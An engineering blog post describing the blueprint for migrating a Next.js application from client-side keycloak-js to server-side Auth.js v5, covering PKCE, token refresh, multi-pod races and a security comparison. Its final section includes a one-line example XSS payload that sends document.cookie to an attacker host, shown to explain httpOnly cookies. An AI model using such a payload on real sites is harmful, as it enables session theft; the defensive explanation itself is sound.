Migrating from keycloak-js to Auth.js v5 — A Hybrid SSR Auth Blueprint for Next.js
We recently completed the architecture blueprint for migrating a production Next.js application from client-side keycloak-js to server-side Auth.js v5 with a confidential Keycloak client. This post shares the full blueprint — the reasoning, the architecture, the security tradeoffs, and the migration roadmap — so other teams considering the same move can learn from our research.
This is not a tutorial. It is an honest engineering document: where the security model genuinely improves, where it does not, and what we decided to defer.
1. Why Migrate?
Our application currently authenticates via keycloak-js — Keycloak’s official browser library that handles login, token storage, and refresh entirely on the client side. There is nothing wrong with keycloak-js itself — it is actively maintained and works well for what it does. The current auth flow functions correctly in production.
However, client-side token management has an inherent security ceiling: any token accessible to JavaScript is accessible to an XSS attacker. To raise that ceiling, we need server-side token management — and keycloak-js can only run in the browser. Keycloak’s own server-side Node.js adapter (keycloak-connect) has been deprecated since 2022 due to lack of Node.js maintainers on the Keycloak team, with their recommendation being to use standard OIDC libraries instead.
For Next.js server-side auth, the two leading open-source options are Auth.js v5 (formerly NextAuth.js — the largest ecosystem) and Better Auth (newer, better TypeScript inference, built-in 2FA/RBAC). As of 2026, Auth.js maintenance has been taken over by the Better Auth team, signaling consolidation rather than fragmentation. We chose Auth.js v5 for its mature Keycloak provider, proven PKCE support, and encrypted cookie sessions — with a clear succession path via Better Auth if needed.
This is not a forced migration away from a broken tool. It is a deliberate choice to move tokens off the browser for stronger security, while gaining SSR auth capabilities as a bonus:
| Concern | Current (keycloak-js) | Target (Auth.js v5) |
|---|---|---|
| Token storage | sessionStorage (JS-accessible) | httpOnly cookie (invisible to JS) |
| XSS exposure | Attacker script can read both tokens | Refresh token never reaches page JavaScript; access token reachable only via the session endpoint |
| SSR auth | Impossible — tokens exist only in browser | auth() available in Server Components |
| Token refresh | Client polls every 60s (kc.updateToken) | Server refreshes on-demand, automatically |
| Token access | sessionStorage.getItem("accessToken") | useSession() -> session.accessToken |
| Logout | keycloak.logout() (client-only) | signOut() — federated (Keycloak session also ends) |
| Client type | Public (no secret) | Confidential (server holds secret) |
| Auth library | keycloak-js (~50KB) | No Keycloak-specific browser library; useSession() ships with next-auth |
In short: the browser currently manages the full token lifecycle — storage, refresh, rotation, logout. After migration, all of that moves to the Next.js server. The browser becomes an auth consumer, not an auth manager. It calls useSession() to read the current token, and nothing else.
Three Patterns: Client-Only, Hybrid, and Full BFF
There are three ways to handle auth in a Next.js app. Each moves more responsibility from the browser to the server:
Client-only: Browser --manages tokens--> Gateway
Hybrid: Browser --reads token----> Gateway (server manages tokens)
Full BFF: Browser --cookie only----> Next.js --> Gateway (server proxies everything)
| | Client-only (current) | Hybrid (our target) | Full BFF |
|---|---|---|---|
| Who manages tokens | Browser — stores, refreshes, rotates | Server — stores, refreshes, rotates | Server — same as hybrid |
| Who makes API calls | Browser -> Gateway directly | Browser -> Gateway directly | Browser -> Next.js -> Gateway |
| Token in browser | Access + refresh (both in sessionStorage) | Access only (via useSession()) | None |
| XSS damage | Full token theft, long-term access | Access token obtainable via session endpoint (see Honest XSS Assessment below) | No tokens to steal |
| API call latency | 1 hop | 1 hop | 2 hops (extra server round-trip) |
| Migration effort | — | Change token source + add server auth | Rewrite every API route as server proxy |
| Code change scope | — | Auth layer only | Auth layer + every API client file |
Why hybrid: it eliminates the biggest risk (refresh token theft leading to long-term session hijacking) with the least disruption. The browser still gets a short-lived access token to call the Gateway directly — same data flow as today, just a different token source. No API routes need rewriting, no extra latency, and the CSR architecture stays intact.
Full BFF would eliminate even the short-lived access token exposure, but at significant cost: every API endpoint needs a corresponding Next.js proxy route, every API call adds a server hop, and the Next.js server becomes a bottleneck for all API traffic. That tradeoff is not worth it for our current threat model — and the hybrid pattern already covers the critical attack surface.
If the threat model changes in the future (a real XSS incident, stricter compliance requirements, or sensitive operations like payments), BFF becomes a natural step 2 built on top of the hybrid foundation. The auth infrastructure is identical in both paths — only the Axios token source would be replaced by server-side proxy routes. Nothing built in the hybrid phase is thrown away.
A note on CSR-heavy codebases: our application is predominantly client-side rendered — most pages fetch data from the browser via Axios. This migration does not change that. We are not converting the app to SSR. The primary goal is the security upgrade (getting refresh tokens off the browser), not SSR auth capabilities. Features like auth() in Server Components become available as a bonus, but the app continues to work as a CSR app with useSession() as the token source.
2. Architecture Overview
All users live in a Keycloak realm, not in any specific client. A client is just a doorway — it defines how authentication happens, not who can authenticate. Today everyone logs in through a public client. After migration, they log in through a new confidential client — same credentials, same roles, same permissions, different door.
Keycloak Realm
├── Users: user-A, user-B, user-C ... ← realm-level, shared across all clients
├── Client: app-frontend ← current door (public, browser-side)
└── Client: app-bff ← new door (confidential, server-side)
Current State
Browser --[keycloak-js]--> Keycloak (public client: app-frontend)
│
├── stores tokens in sessionStorage
├── refreshes via kc.updateToken(60) every 60s
└── sends Bearer token via Axios interceptor --> Spring Cloud Gateway
Target State
Browser --> Next.js (Auth.js v5) --> Keycloak (confidential client: app-bff)
│ │
│ ├── server holds tokens in encrypted httpOnly cookie
│ ├── refreshes on-demand with mutex (no polling)
│ └── federated logout via Keycloak end_session_endpoint
│
└── reads accessToken from useSession() --> Spring Cloud Gateway
The Gateway validates JWT signatures against the realm’s public key, so it does not care which client issued the token. Both clients can coexist during transition without any gateway changes.
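To make the "which client issued the token does not matter" point concrete, here is a minimal TypeScript sketch of the kind of check a resource server performs. It is an illustration only, not the Spring Cloud Gateway configuration: the function names, the RS256 assumption, and the issuer URL are hypothetical, and a real gateway would typically load the realm key from the JWKS endpoint rather than receive a PEM string.

```typescript
import { createSign, createVerify, generateKeyPairSync } from "node:crypto";

// Subset of claims relevant here; `azp` names the client the token was issued to.
interface Claims {
  iss: string;
  azp: string;
  exp: number; // epoch seconds
}

const toBase64Url = (text: string): string =>
  Buffer.from(text, "utf8").toString("base64url");

// Stand-in for Keycloak: signs claims with the realm's private key (RS256).
function signJwt(claims: Claims, realmPrivateKeyPem: string): string {
  const header = toBase64Url(JSON.stringify({ alg: "RS256", typ: "JWT" }));
  const payload = toBase64Url(JSON.stringify(claims));
  const signature = createSign("RSA-SHA256")
    .update(`${header}.${payload}`)
    .sign(realmPrivateKeyPem, "base64url");
  return `${header}.${payload}.${signature}`;
}

// Gateway-side check: signature against the realm key, then issuer and expiry.
// `azp` is deliberately not inspected, so tokens from either client pass.
function verifyRealmJwt(
  jwt: string,
  realmPublicKeyPem: string,
  expectedIssuer: string,
  nowSeconds: number,
): Claims | null {
  const parts = jwt.split(".");
  if (parts.length !== 3) return null;
  const [header, payload, signature] = parts;
  const signatureOk = createVerify("RSA-SHA256")
    .update(`${header}.${payload}`)
    .verify(realmPublicKeyPem, signature, "base64url");
  if (!signatureOk) return null;
  const claims = JSON.parse(Buffer.from(payload, "base64url").toString("utf8")) as Claims;
  if (claims.iss !== expectedIssuer || claims.exp <= nowSeconds) return null;
  return claims;
}

// Demo: one realm key pair, two clients (issuer URL is made up).
const realmKeys = generateKeyPairSync("rsa", {
  modulusLength: 2048,
  publicKeyEncoding: { type: "spki", format: "pem" },
  privateKeyEncoding: { type: "pkcs8", format: "pem" },
});
const issuer = "https://keycloak.example.com/realms/demo";
const now = Math.floor(Date.now() / 1000);
const fromPublicClient = signJwt({ iss: issuer, azp: "app-frontend", exp: now + 300 }, realmKeys.privateKey);
const fromConfidentialClient = signJwt({ iss: issuer, azp: "app-bff", exp: now + 300 }, realmKeys.privateKey);
console.log(verifyRealmJwt(fromPublicClient, realmKeys.publicKey, issuer, now)?.azp);
console.log(verifyRealmJwt(fromConfidentialClient, realmKeys.publicKey, issuer, now)?.azp);
```

Both tokens verify because they share the realm's signing key and issuer; only the azp claim differs, and nothing in the check depends on it.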
Component Architecture — Before
graph TB
subgraph "Next.js"
subgraph "Browser (CSR)"
UI[React App]
KJS[keycloak-js]
SS[(sessionStorage)]
end
subgraph "Server"
SSR[Page rendering only<br/>no auth logic]
end
end
subgraph "Keycloak"
KC_PUB["app-frontend<br/>(public client)"]
end
subgraph "Gateway"
GW[Spring Cloud Gateway<br/>JWT validation]
end
KJS -->|"PKCE + login"| KC_PUB
KC_PUB -->|"tokens"| KJS
KJS -->|"store tokens"| SS
UI -->|"read token from sessionStorage"| SS
UI -->|"API calls with Bearer token"| GW
style SSR fill:#ddd,stroke:#999
style KJS fill:#f90,color:#fff
style SS fill:#f90,color:#fff
style KC_PUB fill:#f90,color:#fff
The Next.js server plays no role in auth — it only renders pages. All token management happens in the browser.
Component Architecture — After
Single auth path. keycloak-js, sessionStorage, and the public client are all removed.
graph TB
subgraph "Next.js"
subgraph "Browser (CSR)"
UI[React App]
Session["useSession()<br/>reads accessToken"]
end
subgraph "Server"
Route["/auth-api/auth/[...nextauth]<br/>route.ts"]
Auth["auth.ts<br/>NextAuth config"]
TR["token-refresh.ts<br/>mutex + Keycloak call"]
Cookie[(Encrypted httpOnly<br/>session cookie)]
end
UI -->|"useSession()<br/>GET /auth-api/auth/session"| Route
end
subgraph "Keycloak"
KC_CONF["app-bff<br/>(confidential client)"]
end
subgraph "Gateway"
GW[Spring Cloud Gateway<br/>JWT validation]
end
Route --> Auth
Auth --> TR
TR -->|"POST /token<br/>(refresh)"| KC_CONF
Auth -->|"session cookie"| Cookie
UI -->|"API calls with Bearer token"| GW
style Route fill:#4A90D9,color:#fff
style Auth fill:#4A90D9,color:#fff
style TR fill:#4A90D9,color:#fff
style Cookie fill:#4A90D9,color:#fff
style KC_CONF fill:#4A90D9,color:#fff
style Session fill:#4A90D9,color:#fff
Component Architecture — Full BFF (Future Step 2)
If the threat model ever demands zero client-side token exposure, the architecture evolves into a full BFF proxy. The browser never holds an access token — every API call routes through the Next.js server, which attaches the Bearer token server-side. The auth foundation (Auth.js, token refresh, cookie session) stays the same; what changes is how API calls reach the Gateway.
graph TB
subgraph "Next.js"
subgraph "Browser (CSR)"
UI[React App]
Session["useSession()<br/>session status only — no token"]
end
subgraph "Server"
Route["/auth-api/auth/[...nextauth]<br/>route.ts"]
Auth["auth.ts<br/>NextAuth config"]
TR["token-refresh.ts<br/>mutex + Keycloak call"]
Cookie[(Encrypted httpOnly<br/>session cookie)]
Proxy["API proxy routes"]
end
UI -->|"useSession()<br/>(auth status only)"| Route
UI -->|"API calls<br/>(cookie only, no token)"| Proxy
Proxy -->|"decrypt cookie<br/>attach Bearer token"| Cookie
end
subgraph "Keycloak"
KC_CONF["app-bff<br/>(confidential client)"]
end
subgraph "Gateway"
GW[Spring Cloud Gateway<br/>JWT validation]
end
Route --> Auth
Auth --> TR
TR -->|"POST /token<br/>(refresh)"| KC_CONF
Auth -->|"session cookie"| Cookie
Proxy -->|"Bearer token<br/>(server-to-server)"| GW
style Route fill:#4A90D9,color:#fff
style Auth fill:#4A90D9,color:#fff
style TR fill:#4A90D9,color:#fff
style Cookie fill:#4A90D9,color:#fff
style KC_CONF fill:#4A90D9,color:#fff
style Session fill:#4A90D9,color:#fff
style Proxy fill:#9B59B6,color:#fff
The purple box is the only new piece — proxy routes that forward API calls with the Bearer token attached server-side. Everything else is identical to the hybrid architecture.
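As a rough sketch of what one of those proxy routes would do, the function below rewrites an incoming browser call into the call sent to the Gateway. The /api/proxy prefix, the function name, and the gateway origin are assumptions for illustration; in a real route handler the access token would come from the server-side session, and the request body would also be forwarded, which is left out here.

```typescript
// Hypothetical prefix under which the proxy routes would be mounted.
const PROXY_PREFIX = "/api/proxy";

interface HttpCall {
  url: string;
  method: string;
  headers: Headers;
}

// Maps a browser call (cookie only) to a Gateway call (Bearer token only).
function buildGatewayCall(incoming: HttpCall, gatewayOrigin: string, accessToken: string): HttpCall {
  const source = new URL(incoming.url);
  const underPrefix =
    source.pathname === PROXY_PREFIX || source.pathname.startsWith(`${PROXY_PREFIX}/`);
  const path = underPrefix ? source.pathname.slice(PROXY_PREFIX.length) || "/" : source.pathname;
  const target = new URL(path + source.search, gatewayOrigin);

  const headers = new Headers(incoming.headers);
  headers.delete("cookie"); // the session cookie stays between browser and Next.js
  headers.delete("host"); // let the HTTP client set the Gateway's host
  headers.set("authorization", `Bearer ${accessToken}`); // attached server-side

  return { url: target.toString(), method: incoming.method, headers };
}
```

The browser never sees the Authorization header in this arrangement; it is added after the request has already reached the server.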
Keycloak Clients: Two-Client Coexistence
| Client | Type | Secret | Used by |
|---|---|---|---|
| app-frontend | Public | None | keycloak-js (browser) |
| app-bff | Confidential | Server-side | Auth.js (Next.js server) |
We create a separate confidential client rather than converting the existing one because keycloak-js is a public client library — it does not send a client_secret. Flipping the existing client to confidential would break every active session instantly. Two clients let us migrate at our own pace with zero downtime. After migration and a monitoring period, we deactivate the old public client.
How CSR Works with Server-Side Auth
Our application is predominantly CSR — most pages render in the browser and fetch data via Axios. A natural question: if tokens are managed server-side, how do client-side API calls get the access token?
Auth.js solves this with SessionProvider and useSession(). On page load, SessionProvider makes a single call to the server (GET /auth-api/auth/session), which decrypts the httpOnly cookie and returns the access token as JSON. This is cached in memory and shared across all components — subsequent useSession() calls read from cache, not the network.
1. Page loads
2. SessionProvider -> GET /auth-api/auth/session (one network call)
3. Server decrypts httpOnly cookie -> checks token expiry
4. Token expired? -> server refreshes with Keycloak, updates cookie
5. Returns { accessToken, ... } as JSON response
6. SessionProvider caches in memory
7. Components call useSession() -> read from cache (no network)
8. Axios sends API calls with cached accessToken
9. Tab sits idle -> next useSession() triggers server-side refresh
From the developer’s perspective, the only code change is the token source:
// Before
const token = sessionStorage.getItem("accessToken");
// After
const { data: session } = useSession();
const token = session?.accessToken; // session is null until the first fetch completes
Everything else — storage, refresh, rotation, expiry, logout — is invisible to the component. The CSR pattern stays intact.
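For the Axios side, the token-source switch can be reduced to one small pure function. This is a sketch under assumptions: the accessToken and error fields are whatever your own session type augmentation defines, and withBearerToken is a hypothetical helper name, not part of Auth.js or Axios.

```typescript
// Assumed shape of the augmented session; only the fields used here.
interface SessionLike {
  accessToken?: string;
  error?: string;
}

interface RequestConfigLike {
  url: string;
  headers: Record<string, string>;
}

// Returns a copy of the request config with the Bearer header set.
// Leaves the config untouched when there is no usable token, so the
// caller can decide whether to send the request or redirect to login.
function withBearerToken(config: RequestConfigLike, session: SessionLike | null): RequestConfigLike {
  if (!session || !session.accessToken || session.error) return config;
  return {
    ...config,
    headers: { ...config.headers, Authorization: `Bearer ${session.accessToken}` },
  };
}
```

Inside a request interceptor, which is not a React component and so cannot call the hook, the session would typically come from getSession() in next-auth/react or from a value the component tree stored earlier.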
| Concern | Impact |
|---|---|
| Extra network call on page load | One fetch to session endpoint, cached after. Same pattern as keycloak-js init() today |
| Token refresh timing | Server refreshes on next session fetch, not by polling. SessionProvider re-fetches on window focus and configurable interval |
| SSR auth capabilities mostly unused | Not a problem — security upgrade is the primary goal, SSR auth is a bonus |
| Initial loading state | Session not available until first fetch completes, but keycloak-js has the same onReady delay today |
3. PKCE: Defense-in-Depth
PKCE (Proof Key for Code Exchange, RFC 7636) prevents stolen authorization codes from being exchanged for tokens.
An honest question: we are using a confidential client with a client_secret — do we still need PKCE? The client_secret already prevents an attacker from exchanging a stolen auth code, since they do not have the secret.
In practice, PKCE adds limited value on top of a properly secured confidential client. But we use it anyway for four reasons:
- OAuth 2.1 mandates it for all clients, including confidential ones. This is not arbitrary: OAuth 2.0 (2012) did not require PKCE and learned the hard way. Real-world attacks showed that authorization codes could be intercepted via browser mechanisms (referrer headers, open redirectors, browser history) and replayed even against confidential clients. PKCE was added in RFC 7636 (2015) to close this gap, and OAuth 2.1 retroactively mandates it for everyone rather than leaving it optional.
- It is free: checks: ["pkce", "state"] in the Auth.js config. Zero performance cost, zero maintenance.
- Secret compromise insurance: if client_secret ever leaks, PKCE still blocks auth code theft.
- Auth code injection protection: an attacker injecting their own auth code into a victim’s session is prevented by PKCE (the code_verifier will not match), but not by client_secret alone.
| Scenario | client_secret alone | client_secret + PKCE |
|---|---|---|
| Attacker intercepts auth code | Blocked: no secret | Blocked: no secret AND no code_verifier |
| client_secret gets leaked | Vulnerable: attacker can exchange stolen codes | Still blocked: no code_verifier (bound to session) |
| Auth code injection into victim’s session | Not prevented | Blocked: code_verifier mismatch |
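For orientation, this is roughly where the checks setting lives in an Auth.js v5 config. Treat it as a config fragment under assumptions rather than our actual file: the environment variable names follow the Auth.js naming convention for the Keycloak provider, and the basePath value is taken from the route shown elsewhere in this post. It needs next-auth installed and is not runnable on its own.

```typescript
// auth.ts (sketch): confidential Keycloak client with PKCE and state checks.
import NextAuth from "next-auth";
import Keycloak from "next-auth/providers/keycloak";

export const { handlers, auth, signIn, signOut } = NextAuth({
  // Custom base path for the auth routes (assumed from /auth-api/auth/...).
  basePath: "/auth-api/auth",
  providers: [
    Keycloak({
      clientId: process.env.AUTH_KEYCLOAK_ID, // e.g. app-bff
      clientSecret: process.env.AUTH_KEYCLOAK_SECRET, // stays on the server
      issuer: process.env.AUTH_KEYCLOAK_ISSUER, // realm URL, including /realms/<name>
      checks: ["pkce", "state"],
    }),
  ],
});
```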
How PKCE Works
sequenceDiagram
participant C as Next.js Server
participant KC as Keycloak
C->>C: Generate code_verifier (random 43-128 chars)
C->>C: code_challenge = BASE64URL(SHA256(code_verifier))
C->>C: Store code_verifier in httpOnly cookie
C->>KC: GET /authorize?code_challenge=xxx&code_challenge_method=S256
KC-->>C: Authorization code (code=abc)
C->>KC: POST /token (code=abc, code_verifier=original)
KC->>KC: Verify SHA256(code_verifier) == stored code_challenge
alt Match
KC-->>C: access_token + refresh_token
else Mismatch (attacker)
KC-->>C: 400 Bad Request
end
Step by step:
1. Generate a secret: the Next.js server creates a random string called code_verifier (43-128 characters). This is the “answer” to a puzzle only this session knows.
2. Hash it: the server computes code_challenge = BASE64URL(SHA256(code_verifier)). This is the “puzzle”: easy to compute from the answer, impossible to reverse.
3. Store the answer: Auth.js stores the code_verifier in an httpOnly cookie so it can retrieve it later. (This is an Auth.js implementation detail; RFC 7636 does not prescribe how the verifier is stored.)
4. Send the puzzle to Keycloak: the login request includes the code_challenge. Keycloak stores it and associates it with the authorization code it is about to issue.
5. User logs in: Keycloak authenticates the user and redirects back with an authorization code (code=abc).
6. Exchange code for tokens: the server sends the authorization code AND the original code_verifier to Keycloak’s token endpoint.
7. Keycloak verifies: it hashes the received code_verifier and checks if it matches the code_challenge from step 4. If yes, tokens are issued. If no (an attacker intercepted the code but does not have the verifier), the request is rejected.
The key insight: even if an attacker steals the authorization code in step 5, they cannot complete step 6 without the code_verifier, which exists only inside the httpOnly cookie that Auth.js set when the login started and never appears in the browser’s address bar or in referrer headers.
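The verifier and challenge computation is small enough to show directly. Auth.js does this internally, so the following is only a sketch of the RFC 7636 S256 method using Node's crypto module; the function names are made up for this example.

```typescript
import { createHash, randomBytes } from "node:crypto";

// 32 random bytes encode to a 43-character base64url string,
// the minimum verifier length RFC 7636 allows.
function generateCodeVerifier(): string {
  return randomBytes(32).toString("base64url");
}

// S256 method: code_challenge = BASE64URL(SHA256(ASCII(code_verifier))).
function deriveCodeChallenge(codeVerifier: string): string {
  return createHash("sha256").update(codeVerifier, "ascii").digest("base64url");
}

// What the authorization server does at the token endpoint: recompute the
// challenge from the presented verifier and compare it with the stored one.
function verifierMatchesChallenge(codeVerifier: string, storedChallenge: string): boolean {
  return deriveCodeChallenge(codeVerifier) === storedChallenge;
}

const verifier = generateCodeVerifier();
const challenge = deriveCodeChallenge(verifier);
console.log(verifierMatchesChallenge(verifier, challenge)); // true
console.log(verifierMatchesChallenge("attacker-guess", challenge)); // false
```

Only the challenge travels in the /authorize URL. The verifier is sent once, server to server, in the token request.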
client_secret vs PKCE — What Each Proves
| Mechanism | What it proves |
|---|---|
| client_secret | “This request comes from our registered app” (authenticates the application) |
| PKCE code_verifier | “This token exchange comes from the same session that started the login” (authenticates the session) |
They protect against different attack vectors and are complementary. In our case, client_secret is the primary defense. PKCE is the safety net.
4. Token Lifecycle
Full Login Flow
sequenceDiagram
participant B as Browser
participant N as Next.js (Auth.js v5)
participant K as Keycloak
B->>N: GET /auth-api/auth/signin
N->>N: Generate PKCE code_verifier + code_challenge
N->>B: 302 → Keycloak /authorize
B->>K: User login form
K->>B: 302 → /auth-api/auth/callback/keycloak?code=abc
B->>N: GET /callback?code=abc
N->>K: POST /token (code + code_verifier + client_secret)
K-->>N: { access_token, refresh_token, id_token }
N->>N: jwt callback → encrypt tokens into session cookie
N->>B: Set-Cookie: authjs.session-token (httpOnly, Secure)
Note over B: No tokens in sessionStorage or JS memory
Token Refresh with Mutex
flowchart TD
A[jwt callback triggered] --> B{token expired?}
B -- No --> C[Return existing token]
B -- Yes --> D{refreshPromise exists?}
D -- Yes --> E[Await existing promise]
D -- No --> F[Create new refreshPromise]
F --> G[POST Keycloak /token<br/>grant_type=refresh_token]
G --> H{Success?}
H -- Yes --> I[Updated JWT<br/>new accessToken + expiresAt]
H -- No --> J[JWT with error:<br/>RefreshTokenError]
E --> K[Return shared result]
I --> L[Clear refreshPromise in finally]
J --> L
style J fill:#f96,stroke:#333
style I fill:#6f9,stroke:#333
style E fill:#69f,stroke:#333
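The mutex ensures that concurrent requests (multiple Server Components rendering simultaneously) trigger only one Keycloak refresh call. This matters when refresh token rotation is enforced (the realm's Revoke Refresh Token setting in Keycloak): a refresh token is invalidated after its first use, so a second concurrent refresh with the same token would fail.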
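The flowchart can be sketched as a shared in-flight promise. Two things in this sketch are assumptions rather than a description of our token-refresh.ts: the field names on the token, and the choice to key the in-flight promise by refresh token (a single module-level promise would hand one user's refresh result to another user whose request arrived at the same moment). The actual Keycloak call is injected as a function so the logic can be exercised without a network.

```typescript
// Assumed shape of the token kept in the session cookie.
interface SessionToken {
  accessToken: string;
  refreshToken: string;
  expiresAt: number; // epoch seconds
  error?: "RefreshTokenError";
}

type RefreshedTokens = Pick<SessionToken, "accessToken" | "refreshToken" | "expiresAt">;
type RefreshFn = (refreshToken: string) => Promise<RefreshedTokens>;

// One in-flight refresh per refresh token, shared by concurrent callers
// within this Node.js process only.
const inFlightRefreshes = new Map<string, Promise<SessionToken>>();

function getFreshToken(
  token: SessionToken,
  refresh: RefreshFn,
  nowSeconds: number = Math.floor(Date.now() / 1000),
): Promise<SessionToken> {
  // Still valid: return the existing token unchanged.
  if (nowSeconds < token.expiresAt) return Promise.resolve(token);

  // A refresh for this token is already running: await the same promise.
  const existing = inFlightRefreshes.get(token.refreshToken);
  if (existing) return existing;

  const pending: Promise<SessionToken> = Promise.resolve()
    .then(() => refresh(token.refreshToken))
    .then((next): SessionToken => ({ ...next }))
    // On failure keep the old token but flag it so the client can re-authenticate.
    .catch((): SessionToken => ({ ...token, error: "RefreshTokenError" }))
    .finally(() => {
      inFlightRefreshes.delete(token.refreshToken);
    });

  inFlightRefreshes.set(token.refreshToken, pending);
  return pending;
}
```

In an Auth.js setup this would be called from the jwt callback, with refresh performing the POST to Keycloak's token endpoint using grant_type=refresh_token.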
Multi-Pod Consideration
The mutex above is a module-level variable (refreshPromise) — it only prevents races within a single Node.js process. On Kubernetes, your application may run across multiple pods, and each pod has its own mutex that knows nothing about the others.
The risk: if the same user’s token expires and two of their requests land on different pods at the same moment, both pods try to refresh with the same refresh token. Keycloak rotates refresh tokens on use — the first pod succeeds and gets a new refresh token, the second pod’s request arrives with the now-invalidated old token and fails.
Pod A --[refresh_token_v1]--> Keycloak --> new refresh_token_v2
Pod B --[refresh_token_v1]--> Keycloak --> token already used (rotated)
In practice, this is less likely than it sounds:
- Narrow window: the race only happens if the same user’s token expires and two requests hit different pods in the same instant. Normal browsing generates sequential requests, not simultaneous ones.
- Load balancer affinity: most Kubernetes ingress controllers support session affinity (sticky sessions), which routes the same user to the same pod. If enabled, cross-pod races are nearly impossible.
- Graceful failure: if it does happen, the affected pod returns RefreshTokenError, the client detects it via useSession(), and the user re-authenticates. Annoying, but not a data loss or security issue.
If this becomes a real problem at scale, the fix is a distributed mutex — using Redis to coordinate refresh locks across pods. But this adds complexity and a Redis dependency to the auth path, so we only add it if monitoring shows actual cross-pod refresh failures.
| Scale | Mutex strategy | When to use |
|---|---|---|
| Single pod / dev | Module-level refreshPromise | Default starting point |
| Multi-pod with sticky sessions | Same — affinity prevents cross-pod races | Standard K8s config |
| Multi-pod without affinity, high traffic | Redis distributed lock (SETNX with TTL) | Only if monitoring shows refresh failures |
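If the Redis row ever becomes necessary, the locking part could look roughly like this. It is a sketch with a deliberately abstract store: setIfAbsent and deleteIfEquals are hypothetical method names that would map to Redis SET key value NX PX ttl and to a compare-and-delete script, and the in-memory class exists only so the logic can run locally. One gap is left open on purpose: the request that loses the lock still carries the old cookie, so a real implementation would also need a way to share the winner's result or to retry.

```typescript
import { randomUUID } from "node:crypto";

// Minimal store contract (hypothetical names, see the note above).
interface LockStore {
  setIfAbsent(key: string, value: string, ttlMs: number): Promise<boolean>;
  deleteIfEquals(key: string, value: string): Promise<void>;
}

// Runs `critical` only if this caller wins the per-user lock.
// Returns null when another holder is already refreshing.
async function withRefreshLock<T>(
  store: LockStore,
  userId: string,
  ttlMs: number,
  critical: () => Promise<T>,
): Promise<T | null> {
  const key = `refresh-lock:${userId}`;
  const owner = randomUUID(); // so we only ever release our own lock
  const acquired = await store.setIfAbsent(key, owner, ttlMs);
  if (!acquired) return null;
  try {
    return await critical();
  } finally {
    await store.deleteIfEquals(key, owner);
  }
}

// In-memory stand-in for local runs; it is NOT shared across pods.
class InMemoryLockStore implements LockStore {
  private readonly entries = new Map<string, { value: string; expiresAt: number }>();

  async setIfAbsent(key: string, value: string, ttlMs: number): Promise<boolean> {
    const now = Date.now();
    const current = this.entries.get(key);
    if (current && current.expiresAt > now) return false;
    this.entries.set(key, { value, expiresAt: now + ttlMs });
    return true;
  }

  async deleteIfEquals(key: string, value: string): Promise<void> {
    if (this.entries.get(key)?.value === value) this.entries.delete(key);
  }
}
```

The TTL matters as much as the lock itself: if a pod dies mid-refresh, the key expires on its own instead of blocking that user's refreshes indefinitely.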
5. Migration Roadmap
The migration is structured as a series of independently deployable phases. Each phase builds on the previous one, and the two auth systems (keycloak-js and Auth.js) coexist during the transition — there is no big-bang switch.
graph LR
S0["ADR<br/>✅ done"] --> R1["Research<br/>🔵 in progress"]
S0 --> R2["Architecture<br/>🔵 in progress"]
R1 --> S1["Server Token<br/>Management"]
R2 --> S1
R2 --> S3
S1 --> S2["Middleware<br/>Route Protection"]
S1 --> S3["Axios Token<br/>Source Switch"]
S2 --> S4a["Provider &<br/>Layout"]
S3 --> S4a
S4a --> S4b["Page-by-Page<br/>Migration"]
S4a --> S4c["Login/Logout<br/>& E2E"]
S4b --> S5["Cleanup &<br/>Removal"]
S4c --> S5
S5 --> S6["Client<br/>Consolidation"]
style S0 fill:#6f9,stroke:#333
style R1 fill:#69f,color:#fff
style R2 fill:#69f,color:#fff
style S1 fill:#ddd,stroke:#333
style S2 fill:#ddd,stroke:#333
style S3 fill:#ddd,stroke:#333
style S4a fill:#ddd,stroke:#333
style S4b fill:#ddd,stroke:#333
style S4c fill:#ddd,stroke:#333
style S5 fill:#ddd,stroke:#333
style S6 fill:#ddd,stroke:#333
| Phase | Scope |
|---|---|
| ADR | Architecture Decision Record: chose Auth.js v5 + confidential client + hybrid pattern |
| Research | PKCE deep-dive + Auth.js v5 API research |
| Architecture | Full migration architecture design + security model |
| Server Token Management | Auth.js config, token refresh with mutex, API route handler, TypeScript type augmentation |
| Middleware Route Protection | Next.js middleware for route protection using auth() wrapper |
| Axios Token Source Switch | Axios interceptor reads token from useSession() instead of sessionStorage |
| Provider & Layout | SessionProvider placement and layout restructuring, auth guard disposition |
| Page-by-Page Migration | Mechanical useAuth() to useSession() migration across all pages and test files |
| Login/Logout & E2E | Login/logout flow + E2E test fixture migration |
| Cleanup & Removal | Remove keycloak-js, public client, sessionStorage — single auth path |
| Client Consolidation | Rename the confidential Keycloak client to the canonical name after monitoring period |
Middleware and Axios phases can run in parallel. Page migration and login/logout can also run in parallel.
6. Key Decisions
| # | Decision | Rationale |
|---|---|---|
| 1 | Auth.js v5 over custom PKCE implementation | Auth.js handles PKCE internally; a prior proof-of-concept branch proved custom PKCE is unnecessary maintenance |
| 2 | Confidential client | Server holds client_secret — stronger than public client, enables secure server-to-server token refresh |
| 3 | PKCE + client_secret together | Defense-in-depth: client_secret authenticates the app, PKCE binds the session. OAuth 2.1 requires PKCE even for confidential clients |
| 4 | Custom basePath for auth routes | Avoids routing conflicts with existing proxy configuration |
| 5 | Hybrid token pattern | Server holds tokens in cookie; client gets accessToken via useSession() for API calls |
| 6 | Coexistence during transition | keycloak-js and Auth.js run in parallel. No big-bang switch. Each phase is independently deployable |
| 7 | Mutex for token refresh | Keycloak rotates refresh tokens — concurrent refreshes would invalidate the token. Module-level promise prevents races |
7. Security Comparison
Attack Surface
| Attack | Current (keycloak-js) | Target (Auth.js v5) |
|---|---|---|
| XSS token theft | sessionStorage readable by any script | httpOnly cookie — JS cannot access |
| CSRF | N/A (Bearer token in header) | SameSite=Lax cookie + CSRF token (Auth.js built-in) |
| Auth code interception | PKCE protects (keycloak-js native) | PKCE + client_secret (double protection) |
| Token in URL/referrer | N/A (code flow, not implicit) | Same |
| Session fixation | Client-managed session | Server-managed, encrypted cookie |
| Man-in-the-middle | Tokens transit via JS | Refresh token never leaves the server; session cookie has the Secure flag |
Why httpOnly Cookies Matter
The httpOnly flag is the single most important property of the session cookie. When a cookie is marked httpOnly, the browser enforces a hard rule: JavaScript cannot access it — not through document.cookie, not through any API. The cookie still travels automatically with every HTTP request to the server, but it is invisible to any script running on the page.
This matters because of XSS. If an attacker injects a script into the page:
// Without httpOnly -- attacker reads the cookie and exfiltrates it
fetch("https://evil.com/steal?token=" + document.cookie);
// With httpOnly -- document.cookie doesn't contain the session cookie
// the attacker gets nothing useful
The cookie is there, the browser sends it, but no script can read it. It is like a locked mailbox — the mail carrier delivers and picks up mail, but a stranger cannot open it.
